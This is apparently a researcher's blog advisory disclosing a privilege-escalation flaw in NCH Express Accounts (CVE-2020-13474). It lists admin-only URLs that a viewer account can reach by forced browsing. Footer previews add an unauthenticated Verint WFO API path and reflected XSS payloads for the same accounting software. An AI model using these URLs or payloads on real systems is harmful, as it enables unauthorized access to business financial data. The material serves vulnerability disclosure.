CVE-2020-13474: NCH Express Accounts- Privilege Escalation

 Vulnerable Software: NCH Express Accounts

Vulnerability: Privilege Escalation

Affected Version: 8.24 and prior

Vendor Homepage: https://www.nchsoftware.com/

CVE: CVE-2020-13474

CVE Author: Tejas Nitin Pingulkar

Exploit Available: Yes

About Affected Software

Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow including sales, receipts, payments and purchases.

Additional Information

NCH express Accounts software allows to access it over the web.
A web interface provides 3 types of user

  • Administrator
  • User
  • Viewer

The administrator user has access to all modules including Create new invoice, Create new quote, Create new sales order, Create new purchase order, Apply customers payment, View Credit notes, Enter new account payable, view chart of accounts, Make a payment, Receive a payment, Add new item, Add new customer, Supliers list, Add/Edit users

User with viewer privileges don’t have access to above mentioned functionalities by forceful browsing, we will access admin modules using viewer user privileges

Exploit

I have created below users for POC

Admin user: admin@tejas.com
Viewer user: lowuser@tejas.com
As demonstred in video “chart of accounts” has only one entry and  lowuser@tejas.com dont have access to “chart of accounts” functionality (or any other module mentioned above) reference video [2:14 min]

login as low privileged user and enter below url

http://[website:port]/acclist

Click add new account

fill all details click okay

Via forceful browsing we were able to add entry as low user

Similerly below via forceful browsing we can access below mentioned functions

Add New Invoice: http://[website:port]/invoiceprop?onok=invoicelist&oncancel=invoicelist

Add New Quote: http://[website:port]/quoteprop?onok=quotelist&oncancel=quotelist

Add New Sales Order: http://[website:port]/orderprop?onok=orderlist&oncancel=orderlist

Add New Purchase Order: http://[website:port]/porderprop?onok=porderlist&oncancel=porderlist

Payment:http://[website:port]/porderprop?onok=paymentlist&oncancel=paymentlist

Credit Notes:http://[website:port]/creditnotelistperiod

Account Payable: http://[website:port]/accpayable?onok=billlist&oncancel=billlist

Chart of Accounts: http://[website:port]/acclist (video POC)

Payments and Purchases: http://[website:port]/cashtxn?payment=1

Receipts and Deposits: http://[website:port]/cashtxn?payment=0

Add New Item: http://[website:port]/itemprop?onok=itemlist&oncancel=itemlist

Add New Customer: http://[website:port]/customerprop?onok=customerlist&oncancel=customerlist

Suppliers List: http://[website:port]/supplierlist

Proof Of Concept

Comments

Post a Comment

Popular posts from this blog

CVE-2020-23446 Verint Workforce Optimization (WFO)

Image
Vulnerable Software :  Verint Workforce Optimization (WFO) Vulnerability :   Unauthenticated Information Disclosure via API Affected Version:  15.1 (15.1.0.37634) Vendor Homepage: Link CVE:   2020-23446 CVE Author:  Tejas Nitin Pingulkar Exploit Available:   POC Available About Affected Software: Verint Workforce Optimization is a suite of unified software and services for capturing interactions and managing the performance of employees across the enterprise or in targeted areas of your business, including: Back-office operations Branch operations Contact centers Financial trading rooms Additional Information : Verint WFO application provides functionality to download topology reports to authenticated users, however, using direct object reference/API unauthenticated attacker can obtain reports. Exploit: Access URL :   [IP/Domain]/wfo/rest/em-api/v1/topology/ generation Note: only most recently generated report can be obtained by the attacker Patch : Patched in version 15.2 POC:   Timel
Read more

CVE-2020-13475: NCH accounts-Cross Site Scripting

Image
  Vulnerable Software:  Express Account Vulnerability:  XSS Affected Version:  from 8.06 to 8.24 Vendor Homepage:   https://www.nchsoftware.com/ CVE:  CVE-2020-13475 CVE Author:  Tejas Nitin Pingulkar Exploit Available:   POC Available Patch Status:  Unpatched About Affected Software: Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow including sales, receipts, payments and purchases. Exploit 1>Login as admin Use any of below payload IP:PORT/invoicelist?type=czalc’%3e%3cscript%3ealert(1)%3c%2fscript%3eqb6nc IP:PORT/ invoicedelete?type=mctf8″>%3e%3cscript%3ealert(1)%3c%2fscript%3eqb6ncmwk0t&id=DFT3  [to render second payload click on cancel]   Proof Of Concept Timeline: Vulnerability Discovered – 7 April Initial Email Sent: 19th May 2020 — No response CVE Generated: 26 May 2020 Followup 2: 15 June 2020 — No response Followup 3: 26 July 2020 — No response Acknowledged- 06
Read more